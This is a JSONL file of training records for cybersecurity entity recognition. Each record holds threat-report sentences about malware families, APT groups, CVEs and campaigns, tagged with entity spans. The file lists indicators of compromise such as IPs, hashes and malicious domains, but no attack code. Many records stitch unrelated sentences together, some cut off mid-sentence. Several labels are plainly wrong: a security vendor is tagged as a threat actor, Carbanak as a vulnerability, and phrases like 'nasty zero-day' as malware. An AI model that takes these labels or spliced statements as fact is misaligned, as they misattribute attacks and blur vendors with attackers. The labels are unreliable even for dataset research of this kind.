{"text": "We used a sample app named “ org.starsizew ” with an MD5 of d8caad151e07025fdbf5f3c26e3ceaff to analyze RuMMS ’ s code . In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors , several financial institutes , and the Israeli Post Office . After that , the malware checks if the existence of the files “ ExcelMyMacros.txt ” and “ wordMacros.txt ” in the same path where it is executed : if true then it reads their contents otherwise it will exit . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": {"MALWARE: RuMMS": [[104, 109]], "TOOL: VPN Web Portal": [[158, 172]], "ORGANIZATION: IT vendors": [[208, 218]], "ORGANIZATION: financial institutes": [[229, 249]], "ORGANIZATION: Israeli Post Office": [[260, 279]], "FILEPATH: ExcelMyMacros.txt": [[345, 362]], "FILEPATH: wordMacros.txt": [[371, 385]], "THREAT_ACTOR: CrowdStrike Services": [[528, 548]], "TOOL: Microsoft Exchange": [[654, 672]]}, "info": {"id": "cyberner_stix_train_007650", "source": "cyberner_stix_train"}}
{"text": "During our analysis , we observed this DDE downloading and executing a Zebrocy AutoIt downloader f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1 , configured to attempt to download an additional payload from 220.158.216.127 .", "spans": {"MALWARE: Zebrocy": [[71, 78]], "TOOL: AutoIt": [[79, 85]], "FILEPATH: f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1": [[97, 161]], "IP_ADDRESS: 220.158.216.127": [[225, 240]]}, "info": {"id": "cyberner_stix_train_007651", "source": "cyberner_stix_train"}}
{"text": "However , many users are in no hurry to update the operating systems of their products . Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network . To avoid suspicion , this service name , as well as the executable name , were chosen to look similar to the name of a Microsoft .NET optimiza S-IDTYtion Service . Nevertheless , previous analyses by CERT - UA and FortiGuard Labs indicate that final payloads , which included AgentTesla and Cobalt Strike , were used for information theft and remote access to infected systems .", "spans": {"TOOL: Microsoft .NET optimiza S-IDTYtion Service": [[425, 467]], "ORGANIZATION: CERT - UA": [[506, 515]], "ORGANIZATION: FortiGuard Labs": [[520, 535]], "MALWARE: AgentTesla": [[582, 592]], "MALWARE: Cobalt Strike": [[597, 610]]}, "info": {"id": "cyberner_stix_train_007652", "source": "cyberner_stix_train"}}
{"text": "Tap Menu > Play Protect . Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December . The sole indicator on the source host that at.exe had been run was an application Prefetch file ( C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf ) that was created when the tool was executed . The Metasploit code was released on December 29 , 2012 and the vulnerability was officialy fixed on January 14 , 2013 ( MS13 - 008 ) while the page with the exploit was uploaded on February 11 , 2013 .", "spans": {"ORGANIZATION: Palo Alto Networks AutoFocus": [[55, 83]], "FILEPATH: at.exe": [[367, 373]], "FILEPATH: C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf": [[422, 460]], "VULNERABILITY: vulnerability": [[572, 585]]}, "info": {"id": "cyberner_stix_train_007654", "source": "cyberner_stix_train"}}
{"text": "on 167.99.176.61 : free-androidvpn.date free-androidvpn.download free-androidvpn.online free-vpn.date free-vpn.download free-vpn.online Hashes 22fcfce096392f085218c3a78dd0fa4be9e67ed725bce42b965a27725f671cf 55292a4dde8727faad1c40c914cf1be9dfdcf4e67b515aa593bcd8d86e824372 TEMP.Hermit is generally linked to operations focused on South Korea and the United States . , n.bat n.bat Unknown Likely runs native scilc.exe utility s1.txt", "spans": {"THREAT_ACTOR: TEMP.Hermit": [[272, 283]]}, "info": {"id": "cyberner_stix_train_007655", "source": "cyberner_stix_train"}}
{"text": "Decrypted EventBot configuration Decrypted EventBot configuration returned from the C2 . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 . The loader 's main goal was to run a PowerShell command to execute shellcode .", "spans": {"MALWARE: EventBot": [[10, 18], [43, 51]], "MALWARE: Filensfer": [[89, 98]], "MALWARE: PowerShell command": [[220, 238]]}, "info": {"id": "cyberner_stix_train_007656", "source": "cyberner_stix_train"}}
{"text": "The implant shared certain similarities with the old Miniduke implants .", "spans": {"THREAT_ACTOR: Miniduke": [[53, 61]]}, "info": {"id": "cyberner_stix_train_007657", "source": "cyberner_stix_train"}}
{"text": "Ginning the ratings FURTHER READING 1 million Google accounts compromised by Android malware called Gooligan To implement the VM feature , the malicious APK installation dropper used by HummingWhale uses DroidPlugin , an extension originally developed by developers from China-based company Qihoo 360 , Check Point said . This report will explore the various installers , uninstallers and loaders Novetta has observed the Lazarus Group using . Remcos ( Backdoor.Remvio ) : A commodity remote administration tool ( RAT ) that can be used to steal information from an infected computer . If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": {"ORGANIZATION: Google": [[46, 52]], "SYSTEM: Android": [[77, 84]], "MALWARE: Gooligan": [[100, 108]], "MALWARE: HummingWhale": [[186, 198]], "MALWARE: DroidPlugin": [[204, 215]], "ORGANIZATION: Qihoo 360": [[291, 300]], "ORGANIZATION: Check Point": [[303, 314]], "TOOL: installers": [[359, 369]], "TOOL: uninstallers": [[372, 384]], "ORGANIZATION: Novetta": [[397, 404]], "THREAT_ACTOR: Lazarus Group": [[422, 435]], "MALWARE: Remcos": [[444, 450]], "MALWARE: Backdoor.Remvio": [[453, 468]], "TOOL: PIEHOP": [[613, 619]]}, "info": {"id": "cyberner_stix_train_007658", "source": "cyberner_stix_train"}}
{"text": "Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag .", "spans": {"ORGANIZATION: Bundestag": [[106, 115]]}, "info": {"id": "cyberner_stix_train_007659", "source": "cyberner_stix_train"}}
{"text": "The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": {"MALWARE: JHUHUGIT": [[4, 12]], "THREAT_ACTOR: Sofacy": [[69, 75]], "TOOL: Java": [[110, 114]], "VULNERABILITY: zero-day": [[115, 123]], "VULNERABILITY: CVE-2015-2590": [[126, 139]]}, "info": {"id": "cyberner_stix_train_007660", "source": "cyberner_stix_train"}}
{"text": "Technical analysis Obfuscation On top of recreating ransomware behavior in ways we haven ’ t seen before , the Android malware variant uses a new obfuscation technique unique to the Android platform . The Ke3chang attackers used the older MyWeb malware family from 2010 to 2011 . Here we will examine an example of an oddly formatted ZIP archive hiding the NanoCore . The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": {"SYSTEM: Android": [[111, 118], [182, 189]], "THREAT_ACTOR: Ke3chang": [[205, 213]], "THREAT_ACTOR: attackers": [[214, 223]], "TOOL: MyWeb malware": [[239, 252]], "MALWARE: NanoCore": [[357, 365]], "THREAT_ACTOR: The group 's 91 attacks": [[368, 391]], "MALWARE: nasty zero - day": [[504, 520]]}, "info": {"id": "cyberner_stix_train_007661", "source": "cyberner_stix_train"}}
{"text": "Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations – not destructive attacks or fraud . TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication .", "spans": {"THREAT_ACTOR: Bahamut": [[11, 18]], "THREAT_ACTOR: TG-3390": [[135, 142]]}, "info": {"id": "cyberner_stix_train_007662", "source": "cyberner_stix_train"}}
{"text": "Malware code showing initializing broadcast receiver Figure 15 . cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally . At figure 2, the second EOCD indicates that its only central directory is located at file offset 0xd148f whereas it is at 0xd40d41. (The size of the first But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": {"THREAT_ACTOR: cyber actors": [[65, 77]], "ORGANIZATION: media": [[112, 117]], "ORGANIZATION: aerospace": [[120, 129]], "ORGANIZATION: financial": [[132, 141]], "ORGANIZATION: critical infrastructure sectors": [[148, 179]], "VULNERABILITY: CVE-2023 - 34362": [[445, 461]], "THREAT_ACTOR: Cl0p": [[519, 523]]}, "info": {"id": "cyberner_stix_train_007663", "source": "cyberner_stix_train"}}
{"text": "We will provide an analysis of the HyperBro tool in an upcoming section . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": {"ORGANIZATION: We": [[0, 2]], "MALWARE: HyperBro": [[35, 43]], "ORGANIZATION: CTU": [[171, 174]], "FILEPATH: cmd.exe": [[196, 203]]}, "info": {"id": "cyberner_stix_train_007664", "source": "cyberner_stix_train"}}
{"text": "The code never informed phone users that it was collecting that data , a behavior uniformly viewed by many as a serious security concern . APT10 used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . Daserf : 21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd .", "spans": {"THREAT_ACTOR: APT10": [[139, 144]], "MALWARE: Daserf": [[344, 350]], "FILEPATH: 21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd": [[353, 417]]}, "info": {"id": "cyberner_stix_train_007665", "source": "cyberner_stix_train"}}
{"text": "It was a secondary payload downloaded by Rockloader , the initial payload in a large email campaign using zipped JavaScript attachments .", "spans": {"MALWARE: Rockloader": [[41, 51]], "TOOL: email": [[85, 90]], "TOOL: zipped": [[106, 112]], "TOOL: JavaScript": [[113, 123]]}, "info": {"id": "cyberner_stix_train_007666", "source": "cyberner_stix_train"}}
{"text": "C:\\Users\\user\\AppData\\Roaming\\Blaster.exe :", "spans": {"FILEPATH: C:\\Users\\user\\AppData\\Roaming\\Blaster.exe": [[0, 41]]}, "info": {"id": "cyberner_stix_train_007667", "source": "cyberner_stix_train"}}
{"text": "The analyzed implant has a complex structure , and for now we have observed two modules . The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats , including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad , which was used in the Sony Pictures attack . Activity continued throughout April where additional versions of DarkComet , POSHC2 implants , and an AutoIt backdoor were deployed along with further credential dumping activities . Cisco Secure Endpoint ( formerly AMP for Endpoints ) is ideally suited to prevent the execution of the malware detailed in this post .", "spans": {"THREAT_ACTOR: attackers": [[94, 103]], "TOOL: SSL certificates": [[194, 210]], "TOOL: FakeTLS": [[219, 226]], "TOOL: Destover backdoor": [[252, 269]], "TOOL: Escad": [[287, 292]], "MALWARE: DarkComet": [[405, 414]], "MALWARE: POSHC2": [[417, 423]], "MALWARE: AutoIt backdoor": [[442, 457]], "SYSTEM: Cisco Secure Endpoint ( formerly AMP for Endpoints": [[523, 573]]}, "info": {"id": "cyberner_stix_train_007668", "source": "cyberner_stix_train"}}
{"text": "Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file .", "spans": {"VULNERABILITY: zero day": [[82, 90]], "VULNERABILITY: CVE-2016-4171": [[91, 104]], "ORGANIZATION: Deepen": [[120, 126]], "THREAT_ACTOR: APT6": [[129, 133]], "MALWARE: PDF": [[189, 192]], "MALWARE: ZIP": [[197, 200]], "FILEPATH: SCR file": [[277, 285]]}, "info": {"id": "cyberner_stix_train_007669", "source": "cyberner_stix_train"}}
{"text": "Upon further analysis it became clear this application was as malicious as they come and initially resembled the CopyCat malware , discovered by Check Point Research back in April 2016 . Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand . In addition , Saudi Arabia is a known customer of spyware and has used the technology domestically , according to Citizen Lab , a cybersecurity and human-rights focused research laboratory . Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports for that particular network segment .", "spans": {"MALWARE: CopyCat": [[113, 120]], "ORGANIZATION: Check Point": [[145, 156]], "TOOL: Bookworm C2 servers": [[243, 262]], "MALWARE: spyware": [[410, 417]], "ORGANIZATION: Citizen Lab": [[474, 485]]}, "info": {"id": "cyberner_stix_train_007670", "source": "cyberner_stix_train"}}
{"text": "With these details , we will then draw some conclusions about the operators of CARBANAK . CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": {"THREAT_ACTOR: CARBANAK": [[79, 87]], "ORGANIZATION: CapabilitiesFormBook": [[90, 110]], "ORGANIZATION: banker": [[154, 160]]}, "info": {"id": "cyberner_stix_train_007671", "source": "cyberner_stix_train"}}
{"text": "Aside from a change in its deployment techniques , a few changes in its code set it apart from its previous versions . Researchers have pointed out that it is not uncommon for China-based threat groups to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement . SHA256: 5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43 . The IP range for “ PIG GOD ” is 43[.]255[.]188.0/22 , which appears to be hosted in Hong Kong as seen in the information we found : The domain 66[.]to leads to another website that shows Hack520 ’s pet pig .", "spans": {"THREAT_ACTOR: threat groups": [[188, 201]], "ORGANIZATION: media organizations": [[222, 241]], "FILEPATH: 5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43": [[326, 390]]}, "info": {"id": "cyberner_stix_train_007672", "source": "cyberner_stix_train"}}
{"text": "The attackers invested significant effort in attempting to hide the tool by changing the source code of the RAT and the RAT server , and by using an obfuscator and packer .", "spans": {"TOOL: RAT": [[108, 111], [120, 123]]}, "info": {"id": "cyberner_stix_train_007673", "source": "cyberner_stix_train"}}
{"text": "We identified a notable lack of sophistication in this investigation such as copy/paste , unstable code , dead code and panels that are freely open . During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans . The attackers ’ deliberate use of compromised machines and dynamic Domain Name System ( DNS ) services allows them to hide traces of their presence by confusing their activities with data belonging to legitimate individuals . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": {"THREAT_ACTOR: threat actors": [[525, 538]], "TOOL: NetSupport RAT": [[556, 570]]}, "info": {"id": "cyberner_stix_train_007674", "source": "cyberner_stix_train"}}
{"text": "Due to this Cerberus will come in handy for actors that want to focus on performing fraud without having to develop and maintain a botnet and C2 infrastructure . Since it was active in 2012 , it has been carrying out attacks against sensitive targets in China and is one of the most active APT attack organizations targeting mainland China in recent years . APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats .", "spans": {"MALWARE: Cerberus": [[12, 20]], "ORGANIZATION: organizations": [[301, 314]], "THREAT_ACTOR: APT39": [[358, 363]], "THREAT_ACTOR: groups": [[454, 460]], "ORGANIZATION: FireEye": [[461, 468]]}, "info": {"id": "cyberner_stix_train_007675", "source": "cyberner_stix_train"}}
{"text": "Initiating the MQTT client . We assess APT33 works at the behest of the Iranian government . The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when . One of the problems with relying entirely on one security solution is that the cyber threat landscape changes rapidly .", "spans": {"THREAT_ACTOR: APT33": [[39, 44]]}, "info": {"id": "cyberner_stix_train_007676", "source": "cyberner_stix_train"}}
{"text": "The threat actors have evolved to whitelisting IP addresses and only delivering the exploit and payload to specific targets of interest .", "spans": {}, "info": {"id": "cyberner_stix_train_007677", "source": "cyberner_stix_train"}}
{"text": "Trend Micro detects these as ANDROIDOS_XLOADER.HRX . DoNot Team’s confirmed use of this IP dates back to September 2018 , with a six-month gap until it was used to host doppelganger domains for the LUCKY ELEPHANT campaign in early February . Surprisingly , the source code is composed by more than 1600 lines of code and it is highly obfuscated .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "THREAT_ACTOR: DoNot": [[53, 58]]}, "info": {"id": "cyberner_stix_train_007678", "source": "cyberner_stix_train"}}
{"text": "According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate ’s network as early as February 2016 .", "spans": {"MALWARE: Winnti": [[55, 61]]}, "info": {"id": "cyberner_stix_train_007679", "source": "cyberner_stix_train"}}
{"text": "It is the only activity group intentionally compromising and disrupting industrial safety instrumented systems , which can lead to scenarios involving loss of life and environmental damage .", "spans": {}, "info": {"id": "cyberner_stix_train_007680", "source": "cyberner_stix_train"}}
{"text": "The Trojan sends these digits to the C & C , which in turn sends a command to display a fake data entry window to check the four digits . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . Between August 2 and 4 , the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors .", "spans": {"MALWARE: date string hardcoded": [[164, 185]], "TOOL: Bookworm sample": [[196, 211]], "THREAT_ACTOR: actor": [[265, 270]], "TOOL: emails": [[299, 305]], "ORGANIZATION: defense contractors": [[365, 384]]}, "info": {"id": "cyberner_stix_train_007681", "source": "cyberner_stix_train"}}
{"text": "FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 . One of the attacks used Tropic Trooper 's known Yahoyah malware , but the other attack deployed the widely available Poison Ivy RAT .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "VULNERABILITY: CVE-2017-10271": [[79, 93]], "MALWARE: Yahoyah": [[215, 222]], "MALWARE: malware": [[223, 230]]}, "info": {"id": "cyberner_stix_train_007682", "source": "cyberner_stix_train"}}
{"text": "Of these modifications , arguably the most important were the ones done to the loader .", "spans": {}, "info": {"id": "cyberner_stix_train_007683", "source": "cyberner_stix_train"}}
{"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . Thus , it is clear they are trying to be as stealthy as possible by hiding in the network traffic of the targeted organizations .", "spans": {"VULNERABILITY: Carbanak": [[11, 19]], "ORGANIZATION: banks": [[79, 84]], "ORGANIZATION: payment systems": [[91, 106]]}, "info": {"id": "cyberner_stix_train_007684", "source": "cyberner_stix_train"}}
{"text": "Depending on the Trojan version , dynamically generated subdomains can also be used . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group .", "spans": {"ORGANIZATION: Trend Micro": [[100, 111]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[145, 164]], "ORGANIZATION: Microsoft": [[216, 225]], "ORGANIZATION: Facebook": [[250, 258]], "THREAT_ACTOR: Lazarus Group": [[349, 362]]}, "info": {"id": "cyberner_stix_train_007685", "source": "cyberner_stix_train"}}
{"text": "On opening the app , two pop-up messages appear on screen : Change SMS App : This sets permissions to intercept every SMS received on the device and send a copy of these messages to the C2 server . If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": {"THREAT_ACTOR: hackers": [[248, 255]], "TOOL: emails": [[447, 453]], "FILEPATH: Microsoft Word documents": [[459, 483]], "VULNERABILITY: CVE-2017-0199": [[495, 508]]}, "info": {"id": "cyberner_stix_train_007686", "source": "cyberner_stix_train"}}
{"text": "Some applications rely on SMS when it comes to in-app purchases — the transaction data is transferred via a short text message . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . Since our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new activity .", "spans": {"ORGANIZATION: Kaspersky": [[129, 138]], "THREAT_ACTOR: ScarCruft": [[155, 164]], "VULNERABILITY: zero-day": [[194, 202]], "VULNERABILITY: CVE-2016-0147": [[205, 218]]}, "info": {"id": "cyberner_stix_train_007687", "source": "cyberner_stix_train"}}
{"text": "Contacting the C2 server for instructions . FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group — which goes by other names , including FinFisher and Lench IT Solutions . The body of the macro can be logically divided into two distinct parts : The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": {"TOOL: FinSpy": [[44, 50]], "THREAT_ACTOR: attacker": [[94, 102]], "THREAT_ACTOR: Gamma Group": [[209, 220]], "ORGANIZATION: FinFisher": [[261, 270]], "TOOL: macro": [[312, 317]], "THREAT_ACTOR: Monti ransomware collective": [[373, 400]], "ORGANIZATION: legal and governmental fields": [[466, 495]]}, "info": {"id": "cyberner_stix_train_007688", "source": "cyberner_stix_train"}}
{"text": "For instance , the Trojan could automatically reply to an SMS and immediately delete it . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . simultaneous use of the detected Win32/KillDisk.NBO variants .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[94, 125]], "MALWARE: data-gathering implant": [[163, 185]], "MALWARE: Win32/KillDisk.NBO": [[256, 274]]}, "info": {"id": "cyberner_stix_train_007689", "source": "cyberner_stix_train"}}
{"text": "The notification was intended to be used for system alerts or errors , but Android threats misused it to force the attacker-controlled UI to fully occupy the screen , blocking access to the device . Ultimately , this lead us to the conclusion that several of Gorgon Group 's members have a nexus in Pakistan . using the following IDAPython command in Output window : The attackers then ran reconnaissance commands such as whoami , netstat , quser , and net share , and tried to enumerate other servers for lateral movement with the quser and net view commands .", "spans": {"SYSTEM: Android": [[75, 82]], "THREAT_ACTOR: Gorgon Group": [[259, 271]], "TOOL: IDAPython": [[330, 339]], "THREAT_ACTOR: attackers": [[371, 380]], "TOOL: whoami": [[422, 428]], "TOOL: netstat": [[431, 438]], "TOOL: quser": [[441, 446], [532, 537]], "TOOL: net share": [[453, 462]], "TOOL: net view": [[542, 550]]}, "info": {"id": "cyberner_stix_train_007690", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : 208.115.242.36 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 208.115.242.36": [[10, 24]]}, "info": {"id": "cyberner_stix_train_007691", "source": "cyberner_stix_train"}}
{"text": "This trick – posing as a part of a legitimate Google service – may help avoid scrutiny . APT32 actors continue to deliver the malicious attachments via spear-phishing emails . The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors .", "spans": {"ORGANIZATION: Google": [[46, 52]], "THREAT_ACTOR: APT32": [[89, 94]], "MALWARE: malicious attachments": [[126, 147]], "ORGANIZATION: Network Security": [[180, 196]], "TOOL: IPS": [[211, 214]], "TOOL: NGFW": [[219, 223]]}, "info": {"id": "cyberner_stix_train_007692", "source": "cyberner_stix_train"}}
{"text": "It turns out , that Trojans behave quite the same way . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system .", "spans": {"TOOL: Lamberts toolkit": [[125, 141]], "TOOL: Black Lambert": [[158, 171]], "VULNERABILITY: zero day exploit": [[208, 224]], "VULNERABILITY: CVE-2014-4148": [[227, 240]], "THREAT_ACTOR: OilRig": [[308, 314]], "FILEPATH: Clayslide delivery documents": [[322, 350]]}, "info": {"id": "cyberner_stix_train_007693", "source": "cyberner_stix_train"}}
{"text": "Trojan.Sofacy ( also known as Seduploader ) performs basic reconnaissance on an infected computer and can download further malware .", "spans": {"FILEPATH: Trojan.Sofacy": [[0, 13]], "MALWARE: Seduploader": [[30, 41]]}, "info": {"id": "cyberner_stix_train_007694", "source": "cyberner_stix_train"}}
{"text": "When executed , the Poison Ivy threat , or Backdoor.Odivy , connects to a command and control ( C&C ) server over TCP port 80 .", "spans": {"MALWARE: Poison Ivy": [[20, 30]], "FILEPATH: Backdoor.Odivy": [[43, 57]], "TOOL: command and control": [[74, 93]], "TOOL: C&C": [[96, 99]]}, "info": {"id": "cyberner_stix_train_007695", "source": "cyberner_stix_train"}}
{"text": "This is why we recently released Cybereason Mobile , a new offering that strengthens the Cybereason Defense Platform by bringing prevention , detection , and response capabilities to mobile devices . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . Given the level of client network access MSPs have , once APT10 has gained access to a MSP , it is likely to be relatively straightforward to exploit this and move laterally onto the networks of potentially thousands of other victims .", "spans": {"SYSTEM: Cybereason Mobile": [[33, 50]], "SYSTEM: Cybereason Defense Platform": [[89, 116]], "TOOL: .doc files": [[254, 264]], "MALWARE: RTF documents": [[285, 298]], "VULNERABILITY: CVE-2017-8570": [[323, 336]], "VULNERABILITY: Composite": [[339, 348]], "VULNERABILITY: Moniker": [[349, 356]], "ORGANIZATION: MSPs": [[402, 406]], "THREAT_ACTOR: APT10": [[419, 424]], "MALWARE: MSP": [[448, 451]], "VULNERABILITY: exploit": [[503, 510]]}, "info": {"id": "cyberner_stix_train_007696", "source": "cyberner_stix_train"}}
{"text": "Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . NetSarang , which has headquarters in South Korea and the United States , removed the backdoored update , but not before it was activated on at least one victim 's machine in Hong Kong .", "spans": {"VULNERABILITY: CVE-2017-0144": [[75, 88]]}, "info": {"id": "cyberner_stix_train_007697", "source": "cyberner_stix_train"}}
{"text": "If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit ( CVE-2018-0798 ) .", "spans": {"TOOL: xlsm file": [[38, 47]], "MALWARE: it": [[50, 52]], "FILEPATH: AsyncRAT": [[249, 257]], "VULNERABILITY: exploit": [[305, 312]], "VULNERABILITY: CVE-2018-0798": [[315, 328]]}, "info": {"id": "cyberner_stix_train_007698", "source": "cyberner_stix_train"}}
{"text": "Now , using these strings method1 can use reflection to call sendTextMessage and process the payment . As we wrote then , compared to Kingphish , Bahamut operates as though it were a generation ahead in terms of professionalism and ambition . The functionality ( connect or bind ) depends on the data contained within the named pipe . This has been coined as the Mark Heptad yes after this author and creator .", "spans": {"ORGANIZATION: Mark Heptad": [[363, 374]]}, "info": {"id": "cyberner_stix_train_007699", "source": "cyberner_stix_train"}}
{"text": "While continuing to monitor activity of the OceanLotus APT Group , Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file . The Winnti group’s Opsec was dismal to say the least . This mode of operation is typical of many hacker groups—and especially of Winnti .", "spans": {"THREAT_ACTOR: OceanLotus": [[44, 54]], "ORGANIZATION: Cylance": [[67, 74]], "THREAT_ACTOR: Winnti": [[218, 224], [343, 349]], "THREAT_ACTOR: hacker": [[311, 317]]}, "info": {"id": "cyberner_stix_train_007700", "source": "cyberner_stix_train"}}
{"text": "However , it does n't request permissions like BIND_ADMIN . Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns . The malicious updaters were hosted on the official liveupdate01s.asus.com and liveupdate01.asus.com ASUS update servers . Given the widespread adoption of Citrix in enterprises globally , we suspect the number of impacted organizations is far greater and in several sectors .", "spans": {"THREAT_ACTOR: APT10": [[103, 108]], "URL: liveupdate01s.asus.com": [[249, 271]], "URL: liveupdate01.asus.com": [[276, 297]], "ORGANIZATION: ASUS": [[298, 302]], "TOOL: Citrix": [[353, 359]]}, "info": {"id": "cyberner_stix_train_007701", "source": "cyberner_stix_train"}}
{"text": "Figure 1 . OceanLotus was another actor active during this period , using a new downloader called KerrDown , as reported by Palo Alto . A new URI is available: <c2-domain>/uploadtm.php .", "spans": {"THREAT_ACTOR: OceanLotus": [[11, 21]], "TOOL: KerrDown": [[98, 106]], "ORGANIZATION: Palo Alto": [[124, 133]], "DOMAIN: <c2-domain>/uploadtm.php": [[160, 184]]}, "info": {"id": "cyberner_stix_train_007702", "source": "cyberner_stix_train"}}
{"text": "CTU researchers assess with high confidence that the threat actors follow an established playbook during an intrusion .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_007703", "source": "cyberner_stix_train"}}
{"text": "The Full Shamoon : How the Devastating Malware Was Inserted Into Networks", "spans": {"MALWARE: Shamoon": [[9, 16]]}, "info": {"id": "cyberner_stix_train_007704", "source": "cyberner_stix_train"}}
{"text": "Figure 2 : Bit.ly statistics for a phishing landing page targeting Bank Austria customers The actor appears to have recently begun using “ .top ” top-level domains ( TLDs ) for their phishing landing pages and have implemented a consistent naming structure as shown below . The threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors . Patchwork is a cyberespionage group that was first observed in December 2015 .", "spans": {"SYSTEM: Bank Austria": [[67, 79]], "THREAT_ACTOR: threat actors": [[278, 291]], "THREAT_ACTOR: Patchwork": [[396, 405]]}, "info": {"id": "cyberner_stix_train_007705", "source": "cyberner_stix_train"}}
{"text": "] com 54.71.249 [ . Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME . The threat actors behind the campaign use social engineering to infect their victims with the Pierogi backdoor for cyber espionage purposes . Two days following the OT activity , Sandworm deployed a new variant of CADDYWIPER throughout the IT environment .", "spans": {"ORGANIZATION: Dragos": [[20, 26]], "THREAT_ACTOR: XENOTIME": [[103, 111]], "MALWARE: Pierogi backdoor": [[208, 224]], "THREAT_ACTOR: Sandworm": [[293, 301]], "TOOL: CADDYWIPER": [[328, 338]], "SYSTEM: IT environment": [[354, 368]]}, "info": {"id": "cyberner_stix_train_007706", "source": "cyberner_stix_train"}}
